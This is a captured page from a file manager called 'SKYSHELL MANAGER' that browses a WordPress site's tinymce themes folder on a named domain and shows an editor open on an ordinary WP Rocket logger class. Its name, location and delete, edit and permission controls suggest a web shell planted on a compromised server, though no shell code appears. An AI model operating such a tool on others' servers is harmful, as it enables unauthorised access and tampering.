📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
modern
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
1758.87 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: ServiceProvider.php
<?php namespace WP_Rocket\Logger; use WP_Rocket\Dependencies\League\Container\ServiceProvider\AbstractServiceProvider; class ServiceProvider extends AbstractServiceProvider { /** * Array of services provided by this service provider * * @var array */ protected $provides = [ 'logger', ]; /** * Check if the service provider provides a specific service. * * @param string $id The id of the service. * * @return bool */ public function provides( string $id ): bool { return in_array( $id, $this->provides, true ); } /** * Register classes provided. */ public function register(): void { $this->getContainer()->addShared( 'logger', Logger::class ); $this->getContainer() ->inflector( LoggerAwareInterface::class ) ->invokeMethod( 'set_logger', [ $this->getContainer()->get( 'logger' ) ] ); } }
Save